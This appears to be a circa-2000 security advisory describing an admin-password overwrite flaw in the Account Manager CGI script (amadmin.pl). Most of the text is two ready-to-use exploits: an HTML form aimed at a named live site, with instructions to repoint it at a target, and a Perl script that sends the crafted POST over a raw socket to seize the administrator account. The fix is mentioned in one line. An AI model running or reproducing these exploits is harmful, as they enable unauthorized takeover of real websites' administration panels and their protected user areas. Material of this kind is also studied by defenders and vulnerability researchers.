COMMAND
Account Manager CGI
SYSTEMS AFFECTED
ALL including LITE and PRO haven't been able to test ENTERPRISE
PROBLEM
'n30' found following. The Script allows any remote user access
to the Administration Control Panel through overwriting the Admin
Password with one of their own making. This is possible since
the script parses the inputted data with total disregard for
whether the current userhas Admin priveleges. Therefore calling
www.server.com/cgibin/amadmin.pl?setpasswd
using a POST command would allow the password to be altered.
Using this exploit would give a remote user access to add and
remove users from protected areas of your website perphaps to
other more interesting CGI's.
Here comes the exploit:
<FORM ACTION="http://www.decodeco.com/cgi-bin/acctman/amadmin.pl" METHOD="POST"><CENTER><BR>
<TABLE BORDER="0" WIDTH="450"><TBODY><COLDEFS><COLDEF></COLDEFS><ROWS><TR><TD
COLSTART="1"><P><B><FONT FACE="verdana, arial, helvetica"><FONT
COLOR="#FF0000">Account Manager LITE/PRO</FONT>: Password Exploit!</FONT></B></P>
<CENTER><FONT FACE="verdana, arial, helvetica"><FONTCOLOR="#FF0000">n30</FONT></B></P></CENTER>
<P><FONT SIZE="-1" FACE="verdana, arial, helvetica">Please enter your password twice. Once to set it, and once to confirm it.</FONT></P>
<CENTER><TABLE BORDER="0"><TBODY><COLDEFS><COLDEF><COLDEF></COLDEFS><ROWS><TR
><TD ALIGN="RIGHT" COLSTART="1"><INPUT TYPE="PASSWORD" NAME="pwd"></TD><TD
COLSTART="2"><FONT SIZE="-2" FACE="verdana, arial, helvetica">password</FONT></TD></TR>
<TR><TD ALIGN="RIGHT" COLSTART="1"><INPUT TYPE="PASSWORD" NAME="pwd2"></TD><TD
COLSTART="2"><FONT SIZE="-2" FACE="verdana, arial, helvetica">confirmation</FONT></TD></TR>
<TR><TD ALIGN="CENTER" COLSTART="1"><BR><INPUT
TYPE="SUBMIT" NAME="setpwd" VALUE=" Set Password "></TD><TD COLSTART="2"><BR></TD></TR></ROWS></TBODY></TABLE></CENTER><CENTER><TABLE
BORDER="0" WIDTH="400"><TBODY><COLDEFS><COLDEF></COLDEFS><ROWS><TR><TD
COLSTART="1"><HR SIZE="1"></TD></TR><TR><TD ALIGN="CENTER" COLSTART="1"><FONT
SIZE="-2" FACE="verdana, arial, helvetica"><B>Account Manager LITE/PRO Admin Passwerd Exploit
</B></A></FONT></TD></TR></ROWS></TBODY></TABLE></CENTER></TD></TR></ROWS></TBODY></TABLE></CENTER>
<CENTER><FONTSIZE="1" FACE="verdana, arial, helvetica"><B><BR> To Use Modify Source To Point to amadmin.pl on TARGET Server <BR><BR><a href="mailto:n30@alldas.de">mail-me</a></CENTER>
</FORM>
<!-- Shoutz to trib, axess and all who know me! -->
Here is another:
#!/usr/bin/perl -w
## Account Manager LITE 1.0x / cgi.elitehost.com
## This exploit let's you change the administrator
## password, and completely take controll.
##
## teleh0r@doglover.com / anno 2000
## httpd://teleh0r.cjb.net
use strict;
use Socket;
if (@ARGV < 2) {
print("Usage: $0 <target> <newpass>\n");
exit(1);
}
my($target,$newpass,$crypt,$length,$command,
$agent,$sploit,$iaddr,$paddr,$proto);
($target,$newpass) = @ARGV;
$crypt = crypt($newpass, 'aa');
$length = 34 + length($newpass);
print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/subscribe.pl\n");
print("New password: $newpass / $crypt\n\n");
$command = "pwd=$newpass&pwd2=$newpass&setpwd=++Set+Password++";
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";
# Note that POST /cgi-bin/amlite/amadmin.pl HTTP/1.0
# may have to be changed...
$sploit=
"POST /cgi-bin/amlite/amadmin.pl HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $length
$command";
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");
close(SOCKET);
sleep(2);
print("Surf to http://$target/cgi-bin/amlite/amadmin.pl\n");
exit(0);
SOLUTION
Already available see website, download version is patched.